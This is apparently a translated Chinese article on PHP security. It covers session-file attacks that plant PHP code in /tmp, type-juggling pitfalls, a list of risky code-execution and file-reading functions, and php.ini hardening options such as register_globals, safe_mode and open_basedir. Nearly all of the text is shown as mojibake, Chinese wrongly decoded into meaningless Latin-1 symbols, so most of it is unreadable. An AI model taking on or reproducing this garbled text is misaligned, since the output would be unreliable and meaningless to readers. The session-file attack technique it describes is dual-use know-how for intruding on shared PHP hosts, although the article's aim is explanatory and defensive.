SessionÊý¾ÝÒ»°aÊDZ£´aeÔÚÎļþÖУ¨Î»ÖÃÊÇ¿ÉÅaÖõģ¬Ò»°aÊÇ¡°/tmp¡±£(C)£¬ÎļþÃuÒ»°aÊÇÀaËÆ¡°sess_¡±µÄÐÎʽ£¬Õa¸oÎļþ°uº¬±aÁ¿Ãu³Æ£¬±aÁ¿ÀaÐÍ£¬±aÁ¿ÖµºÍÒ»Ð(C)ÆaËuµÄÊý¾Ý¡£ÔÚ¶aÖ÷»uϵͳÖУ¬ÒoΪÎļþÊÇÒÔÔËÐÐWebþÎñÆ÷µÄÓû§ÉiÝ£¨Ò»°aÊÇnobody£(C)±£´aeµÄ£¬Òo´Ë¶ñÒaµÄÕ¾µaÓµÓÐÕ߾ͿÉÒÔͨ¹ý´´½¨Ò»¸osessionÎļþÀ´»ñµÃ¶ÔÆaËuÕ¾µaµÄ*ÃÎÊ£¬ÉoÖÁ¿ÉÒÔ¼i²esessionÎļþÖеÄÃo¸ÐÐÅÏ¢¡£

Session»uÖÆҲΪ¹¥»÷Õß°Ñ×Ô¼ºµÄÊaÈe±£´aeÔÚÔ¶³ÌϵͳµÄÎļþÖÐÌa¹(C)ÁËÁiÒ»¸o½±aµÄµØ½£¬¶ÔÓÚÉÏÃaeµÄÀý×ÓÀ´Ëµ£¬¹¥»÷ÕßÐeÒªÔÚÔ¶³Ìϵͳ*ÅÖÃÒ»¸o°uº¬PHP´uÂeµÄÎļþ£¬Èç¹u²»ÄÜÀuÓÃÎļþÉÏÔØ×oµ½µÄ»°£¬Ëuͨ³£»aÀuÓÃsessionΪһ¸o±aÁ¿°´ÕÕ×Ô¼ºµÄÒaÔ¸¸³Ò»¸oÖµ£¬È»ºo²Â²asessionÎļþµÄλÖ㬶øËuÖªµÀÎļþÃuÊÇ¡°php¡±£¬ËuÒÔÖ»Ðe²Â²aĿ¼£¬¶øĿ¼һ°a¾ÍÊÇ¡°/tmp¡±¡£

ÁiÍa£¬¹¥»÷Õß¿ÉÒÔÈÎÒaÖ¸¶¨¡°session id¡±£¨ÀýÈç¡°hello¡±£(C)£¬È»ºoÓÃÕa¸o¡°session id¡±´´½¨Ò»¸osessionÎļþ£¨ÀýÈç¡°/tmp/sess_hello¡±£(C)£¬µ«ÊÇ¡°session id¡±Ö»ÄÜÊÇ×ÖĸºÍÊý×Ö×eºÏ¡£

[Êý¾ÝÀaÐÍ]
PHP¾ßÓбȽÏËÉÉ¢µÄÊý¾ÝÀaÐÍ£¬±aÁ¿µÄÀaÐÍÒÀÀµÓÚËuÃÇËu´¦µÄÉÏÏÂÎÄ»¾³¡£ÀýÈ磺¡°$hello¡±¿ªÊ¼ÊÇ×Öu´®±aÁ¿£¬ÖµÎª¡°¡±£¬µ«ÊÇÔÚÇoֵʱ£¬¾Í±a³ÉÁËÕuÐαaÁ¿¡°0¡±£¬ÕaÓÐʱ¿ÉÄÜ»aµ¼ÖÂÒ»Ð(C)ÒaÏe²»µ½µÄ½a¹u¡£Èç¹u¡°$hello¡±µÄֵΪ¡°000¡±»¹ÊÇΪ¡°0¡±ÊDz»Í¬µÄ£¬empty()*µ»ØµÄ½a¹uÒ²²»»aΪÕae¡£

PHPÖеÄÊý×eÊǹØÁªÊý×e£¬Ò²¾ÍÊÇ˵£¬Êý×eµÄË÷ÒýÊÇ×Ö*u´®Ð͵ġ£ÕaÒaζ×Å¡°$hello["000"]¡±ºÍ¡°$hello[0]¡±Ò²ÊDz»Í¬µÄ¡£

¿ª¢³ÌÐoµÄʱºoÓ¦¸Ã×ÐϸµØ¿¼ÂÇÉÏÃaeµÄÎÊÌa£¬ÀýÈ磬ÎÒÃDz»Ó¦¸ÃÔÚÒ»¸oµØ½²aÊÔij¸o±aÁ¿ÊÇñΪ¡°0¡±£¬¶øÔÚÁiÍaµÄµØ½Ê¹ÓÃempty()À´ÑeÖ¤¡£

[ÈÝÒ׳o´iµÄº¯Êý]
ÎÒÃÇÔÚÖÎoPHP³ÌÐoÖеÄÂ(C)¶´Ê±£¬Èç¹uÄܹ»Äõ½Ô´´uÂeµÄ»°£¬ÄÇôһÝÈÝÒ׳o´iµÄº¯ÊýÁбiÔoÊÇÎÒÃÇdz£ÐeÒªµÄ¡£Èç¹uÎÒÃÇÄܹ»Ô¶³Ì¸Ä±aÕaÐ(C)º¯ÊýµÄ²ÎÊýµÄ»°£¬ÄÇôÎÒÃǾͺܿÉÄÜ¢ÏÖÆaÖеÄÂ(C)¶´¡£ÏÂÃaeÊÇÒ»*ݱȽÏÏeϸµÄÈÝÒ׳o´iµÄº¯ÊýÁбi£º

<PHP´uÂeÖ´ÐÐ>
require()£º¶ÁÈ¡Ö¸¶¨ÎļþµÄÄÚÈݲ¢ÇÒ×÷ΪPHP´uÂe½aÊÍ
include()£ºÍ¬ÉÏ
eval()£º°Ñ¸ø¶¨µÄ×Öu´®×÷ΪPHP´uÂeÖ´ÐÐ
preg_replace()£ºµ±Óe¡°/e¡±¿ª¹ØÒ»ÆðʹÓÃʱ£¬Ìae»»×Öu´®½«±»½aÊÍΪPHP´uÂe

<ÃuÁiÖ´ÐÐ>
exec()£ºÖ´ÐÐÖ¸¶¨µÄÃuÁi£¬µ»ØÖ´Ðнa¹uµÄ×iºoÒ»ÐÐ
passthru()£ºÖ´ÐÐÖ¸¶¨ÃuÁi£¬µ»ØËuÓнa¹uµ½¿Í»§a¯ÀÀÆ÷
``£ºÖ´ÐÐÖ¸¶¨ÃuÁi£¬µ»ØËuÓнa¹uµ½Ò»¸oÊý×e
system()£ºÍ¬passthru()£¬µ«ÊDz»´¦Ài¶þ½øÖÆÊý¾Ý
popen()£ºÖ´ÐÐÖ¸¶¨µÄÃuÁi£¬°ÑÊaÈe»oÊa³oÁ¬½Óµ½PHPÎļþÃeÊou

<Îļþй¶>
fopen()£º´o¿ªÎļþ£¬²¢¶ÔÓ¦Ò»¸oPHPÎļþÃeÊo*u
readfile()£º¶ÁÈ¡ÎļþµÄÄÚÈÝ£¬È»ºoÊa³oµ½¿Í»§a¯ÀÀÆ÷
file()£º°ÑÕu¸oÎļþÄÚÈݶÁµ½Ò»¸oÊý×eÖÐ

ÒeÕß×¢£ºÆaʵÕaÝÁбi»¹²»ÊǺÜÈ«£¬±ÈÈç¡°mail()¡±µÈÃuÁiÒ²¿ÉÄÜÖ´ÐÐÃuÁi£¬ËuÒÔÐeÒª×Ô¼º²¹³aһϡ£
[ÈçºÎÔoÇ¿PHPµÄ°²È«ÐÔ]
ÎÒÔÚÉÏÃae½eÉܵÄËuÓй¥»÷¶ÔÓÚȱʡ°²×°µÄPHP 4¶¼¿ÉÒԺܺõÄʵÏÖ£¬µ«ÊÇÎÒÒѾ­Öظ´Á˺ܶa´Î£¬PHPµÄÅaÖÃdz£Áe»i£¬Í¨¹ýÅaÖÃÒ»Ð(C)PHPÑ¡Ïi£¬ÎÒÃÇÍeÈ«¿ÉÄֿܵ¹ÆaÖеÄÒ»Ð(C)¹¥»÷¡£ÏÂÃaeÎÒ°´ÕÕʵÏÖµÄÄѶȶÔÒ»Ð(C)ÅaÖýøÐÐÁË*ÖÀa£º

µÍÄѶÈ
ÖеÍÄѶÈ
ÖиßÄѶÈ
****¸ßÄѶÈ

ÉÏÃaeµÄÖÀaÖ»ÊǸoÈ˵Ŀ´¨£¬µ«ÊÇÎÒ¿ÉÒÔ±£Ö¤£¬Èç¹uÄaʹÓÃÁËPHPÌa¹(C)µÄËuÓÐÑ¡ÏiµÄ»°£¬ÄÇôÄaµÄPHP½«ÊǺܰ²È«µÄ£¬¼´Ê¹ÊǵÚÈý*½µÄ´uÂeÒ²ÊÇÈç´Ë£¬ÒoΪÆaÖкܶa¹¦ÄÜÒѾ­²»ÄÜʹÓá£

**** ÉeÖá°register_globals¡±Îª¡°off¡±
Õa¸oÑ¡Ïi»a½uÖ¹PHPΪÓû§ÊaÈe´´½¨È«¾Ö±aÁ¿£¬Ò²¾ÍÊÇ˵£¬Èç¹uÓû§Ìa½»±iµ¥±aÁ¿¡°hello¡±£¬PHP²»»a´´½¨¡°$ hello¡±£¬¶øÖ»»a´´½¨¡°HTTP_GET/POST_VARS['hello']¡±¡£ÕaÊÇPHPÖÐÒ»¸o¼«ÆaÖØÒªµÄÑ¡Ïi£¬¹Ø±ÕÕa¸oÑ¡Ïi£¬»a¸ø±a³Ì´øÀ´ºÜ´oµÄ²»±a¡£

** ÉeÖá°safe_mode¡±Îª¡°on¡±
´o¿ªÕa¸oÑ¡Ïi£¬»aÔo¼ÓÈçÏÂÏÞÖÆ£º
1£® ÏÞÖÆÄĸoÃuÁi¿ÉÒÔ±»Ö´ÐÐ
2£® ÏÞÖÆÄĸoº¯Êý¿ÉÒÔ±»Ê¹ÓÃ
3£® »uÓڽű¾ËuÓÐȨºÍÄ¿±eÎļþËuÓÐȨµÄÎļþÃÎÊÏÞÖÆ
4£® ½uÖ¹ÎļþÉÏÔع¦ÄÜ
Õa¶ÔÓÚISPÀ´ËµÊÇÒ»¸oΰ´oµÄÑ¡Ïi£¬Í¬Ê±ËuÒ²Äܼ«´oµØ¸Ä½øPHPµÄ°²È«ÐÔ¡£

** ÉeÖá°open_basedir¡±
Õa¸oÑ¡Ïi¿ÉÒÔ½uÖ¹Ö¸¶¨Ä¿Â¼Ö®ÍaµÄÎļþ²Ù×÷£¬ÓÐЧµØÏu³ýÁ˱¾µØÎļþ»oÕßÊÇÔ¶³ÌÎļþ±»include()µÄ¹¥»÷£¬µ«ÊÇÈÔÐeҪעÒaÎļþÉÏÔغÍsessionÎļþµÄ¹¥»÷¡£

** ÉeÖá°display_errors¡±Îª¡°off¡±£¬ÉeÖá°log_errors¡±Îª¡°on¡±
Õa¸oÑ¡Ïi½uÖ¹°Ñ´iÎoÐÅÏ¢ÏÔʾÔÚÍøÒ³ÖУ¬¶øÊǼǼµ½ÈÕÖ¾ÎļþÖУ¬Õa¿ÉÒÔÓÐЧµÄµÖÖƹ¥»÷Õ߶ÔÄ¿±e½Å±¾Öк¯ÊýµÄ̽²a¡£

• ÉeÖá°allow_url_fopen¡±Îª¡°off¡±
  Õa¸oÑ¡Ïi¿ÉÒÔ½uÖ¹Ô¶³ÌÎļþ¹¦ÄÜ£¬¼«Á¦ÍƼo£¡